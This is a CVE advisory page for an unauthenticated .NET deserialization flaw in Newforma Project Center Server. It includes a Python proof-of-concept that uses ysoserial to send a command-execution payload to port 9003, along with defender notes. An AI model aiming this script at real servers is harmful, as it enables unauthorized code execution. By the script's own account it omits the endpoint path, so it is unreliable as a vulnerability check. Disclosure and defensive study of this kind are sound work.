Security Vulnerability Report
CVE-2025-35051 CVSS 9.8 CRITICAL

CVE-2025-35051

Published: 2025-10-09 21:15:36
Last Modified: 2026-04-26 19:04:19
Source: 9119a7d8-5eab-497f-8521-727c672e3725

Description

Newforma Project Center Server (NPCS) accepts serialized .NET data via the '/ProjectCenter.rem' endpoint on 9003/tcp, allowing a remote, unauthenticated attacker to execute arbitrary code with 'NT AUTHORITY\NetworkService' privileges. According to the recommended architecture, the vulnerable NPCS endpoint is only accessible on an internal network. To mitigate this vulnerability, restrict network access to NPCS.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:newforma:project_center:2024.3:*:*:*:*:*:*:* - VULNERABLE
Newforma Project Center Server (NPCS) - all unpatched versions (the CPE entry above names only version 2024.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-35051 - Newforma Project Center Server .NET Remoting deserialization
#
# Proof-of-concept listing from the advisory page, restored to one statement
# per line. The CVE record classifies the flaw as CWE-306 (missing
# authentication) plus CWE-502 (deserialization of untrusted data): NPCS
# accepts serialized .NET data on '/ProjectCenter.rem' at 9003/tcp, and code
# runs as 'NT AUTHORITY\NetworkService'.
#
# Defender notes:
#   * Mitigation given in the record: restrict network access to NPCS so that
#     9003/tcp is reachable only from the internal hosts that need it.
#   * Worth alerting on: connections to 9003/tcp from outside that expected
#     client set, and child processes started by the NPCS service account
#     that it does not normally launch.
#   * This listing is a sketch. `uri` is built but never sent and the request
#     is only four zero bytes plus the serialized blob, so a run that has no
#     visible effect says nothing about whether a host is vulnerable. Judge
#     exposure from the installed version and from who can reach the port.
import socket
import struct
import subprocess
import sys

TARGET_HOST = "192.168.1.100"  # private (RFC 1918) address used as the example target
TARGET_PORT = 9003  # NPCS .NET Remoting port named in the CVE record
ENDPOINT = "/ProjectCenter.rem"


def generate_payload(command):
    """Return the stdout bytes of an external ysoserial.exe invocation.

    The tool is asked for a BinaryFormatter-serialized object built with the
    WindowsIdentity gadget that wraps *command*. The exit status is not
    inspected: if the tool fails and prints nothing, an empty bytes object is
    returned and the caller treats that as "no payload".
    """
    argv = ["ysoserial.exe"]
    argv += ["-g", "WindowsIdentity"]
    argv += ["-f", "BinaryFormatter"]
    argv += ["-c", command]
    proc = subprocess.run(argv, capture_output=True)
    return proc.stdout


def send_remoting_request(payload):
    """Open one TCP connection to the target, send the blob, return the reply.

    Returns up to 4096 bytes read from the socket, or None when any step
    raises (the exception text is printed). No credentials are sent at any
    point, which is the CWE-306 half of the issue.
    """
    try:
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.settimeout(10)
        conn.connect((TARGET_HOST, TARGET_PORT))

        # Encoded endpoint path; never added to the bytes that are sent.
        uri = ENDPOINT.encode('utf-8')

        # Only framing applied: four zero bytes ahead of the serialized blob.
        framed = b"\x00\x00\x00\x00" + payload

        conn.send(framed)
        reply = conn.recv(4096)
        conn.close()
    except Exception as e:
        # Broad catch: the socket is not explicitly closed on this path.
        print(f"[ERROR] Connection failed: {e}")
        return None
    return reply


def exploit(command="calc.exe"):
    """Run the demonstration end to end, printing progress to stdout.

    Generates the serialized blob for *command*, sends it once, and reports
    whether any bytes came back. Returns None in every case.
    """
    print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}{ENDPOINT}")
    print(f"[*] Command to execute: {command}")

    payload = generate_payload(command)
    if not payload:
        # Empty tool output: stop without printing anything further.
        return

    print(f"[+] Payload generated: {len(payload)} bytes")
    reply = send_remoting_request(payload)
    if not reply:
        print("[-] No response received")
        return

    # Receiving bytes only shows the peer answered, not that code executed.
    print("[+] Payload sent successfully")
    print(f"[+] Server response: {reply[:100]}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        cmd = sys.argv[1]
    else:
        cmd = "calc.exe"
    exploit(cmd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-35051", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-09T21:15:35.873", "lastModified": "2026-04-26T19:04:18.887", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Newforma Project Center Server (NPCS) accepts serialized .NET data via the '/ProjectCenter.rem' endpoint on 9003/tcp, allowing a remote, unauthenticated attacker to execute arbitrary code with 'NT AUTHORITY\\NetworkService' privileges. According to the recommended architecture, the vulnerable NPCS endpoint is only accessible on an internal network. To mitigate this vulnerability, restrict network access to NPCS."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:newforma:project_center:2024.3:*:*:*:*:*:*:*", "matchCriteriaId": "6F878C37-A9AB-4887-9F8E-BC2129CEF077"}]}]}], "references": [{"url": "https://projectcenter.help.newforma.com/overviews/info_exchange_overview/", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Product"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-282-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-35051", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory", "US Government Resource"]}]}}